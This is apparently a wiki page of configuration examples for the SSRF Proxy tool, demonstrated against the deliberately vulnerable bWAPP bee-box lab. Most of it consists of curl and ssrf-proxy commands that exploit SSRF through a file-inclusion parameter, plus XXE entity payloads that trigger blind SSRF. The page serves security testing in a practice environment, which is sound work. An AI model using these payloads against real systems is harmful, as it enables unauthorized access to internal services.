Configuration Examples

The following examples make use of bWAPP bee-box as an example application vulnerable to SSRF.

Basic Configuration

bWAPP is deliberately vulnerable to SSRF. The following will cause the bWAPP application to request http://example.local/ via SSRF:

curl "http://bwapp.local/bWAPP/rlfi.php?ip=&language=http://example.local/"
  --cookie "PHPSESSID=<valid cookie>; security_level=0"

To use this SSRF with SSRF Proxy the URL and cookie must be supplied. The xxURLxx placeholder must also be specified. For example:

ssrf-proxy -u "http://bwapp.local/bWAPP/rlfi.php?ip=&language=xxURLxx"
  --cookie "PHPSESSID=<valid cookie>; security_level=0"

The xxURLxx placeholder exists within the query string. As such, all client requests must be URL encoded. This can be achieved by specifying the urlencode rule with --rules.

ssrf-proxy -u "http://bwapp.local/bWAPP/rlfi.php?ip=&language=xxURLxx"
  --cookie "PHPSESSID=<valid cookie>; security_level=0"
  --rules urlencode

This configuration is sufficient to use the SSRF as a proxy, however effective usage of the request and response modification options will yield more accurate results.

Debugging

The verbose -v and debug -d options may be useful while configuring SSRF Proxy.

ssrf-proxy -u "http://bwapp.local/bWAPP/rlfi.php?ip=&language=xxURLxx"
  --cookie "PHPSESSID=<valid cookie>; security_level=0"
  --rules urlencode
  -v -d

Using an intercepting HTTP proxy such as Burp with --proxy=PROXY :

ssrf-proxy -u "http://bwapp.local/bWAPP/rlfi.php?ip=&language=xxURLxx"
  --cookie "PHPSESSID=<valid cookie>; security_level=0"
  --rules urlencode
  -v -d
  --proxy "http://127.0.0.1:8080"

Response Modification

The relevant response can be extracted by specifying a regex to match with the --match option:

ssrf-proxy -u "http://bwapp.local/bWAPP/rlfi.php?ip=&language=xxURLxx"
  --cookie "PHPSESSID=<valid cookie>; security_level=0"
  --rules urlencode
  --match "</form>\s*<br />\s*(.+)\s*</div>\s*<div id=\"side\">"

bee-box has PHP errors enabled by default. The --guess-status option checks for common application error messages in the response to infer the appropriate HTTP response status code and message.

ssrf-proxy -u "http://bwapp.local/bWAPP/rlfi.php?ip=&language=xxURLxx"
  --cookie "PHPSESSID=<valid cookie>; security_level=0"
  --rules urlencode
  --match "</form>\s*<br />\s*(.+)\s*</div>\s*<div id=\"side\">"
  --guess-status

The --guess-mime option attempts to guess the response content type and set the appropriate Content-Type header. The content type is determined by the file extension of the request URI.

ssrf-proxy -u "http://bwapp.local/bWAPP/rlfi.php?ip=&language=xxURLxx"
  --cookie "PHPSESSID=<valid cookie>; security_level=0"
  --rules urlencode
  --match "</form>\s*<br />\s*(.+)\s*</div>\s*<div id=\"side\">"
  --guess-mime

The --strip=HEADERS option removes the specified HTTP headers from the response. This can be useful to remove inappropriate or undesirable headers such as content-disposition, set-cookie and transfer-encoding.

Request Modification

Several options exist to modify client HTTP requests.

The --forward-cookies option can be used when the SSRF allows forwarding cookies. This option merges all cookies from the client request with the cookie specified in --cookie (if any).

The --body-to-uri option moves the HTTP request body to the query string. This can be useful when the client requests are directed at a third-party application which allows parameters in either the query string or the request body. In this way it is possible to communicate with the target application.

The --auth-to-uri option checks for HTTP Basic credentials in the Authorization client request header and adds them to the request. This can be useful when the SSRF allows sending credentials in the URI, such as http://[user:pass]@host/.

XXE

bWAPP is deliberately vulnerable to XXE which permits blind SSRF. The following will cause the bWAPP application to request http://example.local/ via SSRF:

curl "http://bwapp.local/bWAPP/xxe-2.php"
  --cookie "PHPSESSID=<valid cookie>; security_level=0"
  -X POST
  --data '<!DOCTYPE xxe [ <!ENTITY url SYSTEM "http://example.local/"> ]><reset><login>&url;</login></reset>'

To use this XXE with SSRF Proxy the URL, cookie and POST data must be supplied. The xxURLxx placeholder must also be specified. For example:

ssrf-proxy -u "http://bwapp.local/bWAPP/xxe-2.php"
  --cookie "PHPSESSID=<valid cookie>; security_level=0"
  --method POST
  --post-data '<!DOCTYPE xxe [ <!ENTITY url SYSTEM "xxURLxx"> ]><reset><login>&url;</login></reset>'

The xxURLxx placeholder exists within the request body. As such, all client requests must be URL encoded. This can be achieved by specifying the urlencode rule with --rules.

ssrf-proxy -u "http://bwapp.local/bWAPP/xxe-2.php"
  --cookie "PHPSESSID=<valid cookie>; security_level=0"
  --method POST
  --post-data '<!DOCTYPE xxe [ <!ENTITY url SYSTEM "xxURLxx"> ]><reset><login>&url;</login></reset>'
  --rules urlencode

bee-box has PHP errors enabled by default. The --guess-status option checks for common application error messages in the response to infer the appropriate HTTP response status code and message.

ssrf-proxy -u "http://bwapp.local/bWAPP/xxe-2.php"
  --cookie "PHPSESSID=<valid cookie>; security_level=0"
  --method POST
  --post-data '<!DOCTYPE xxe [ <!ENTITY url SYSTEM "xxURLxx"> ]><reset><login>&url;</login></reset>'
  --rules urlencode
  --guess-status

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Configuration Examples

Basic Configuration

Debugging

Response Modification

Request Modification

XXE

Clone this wiki locally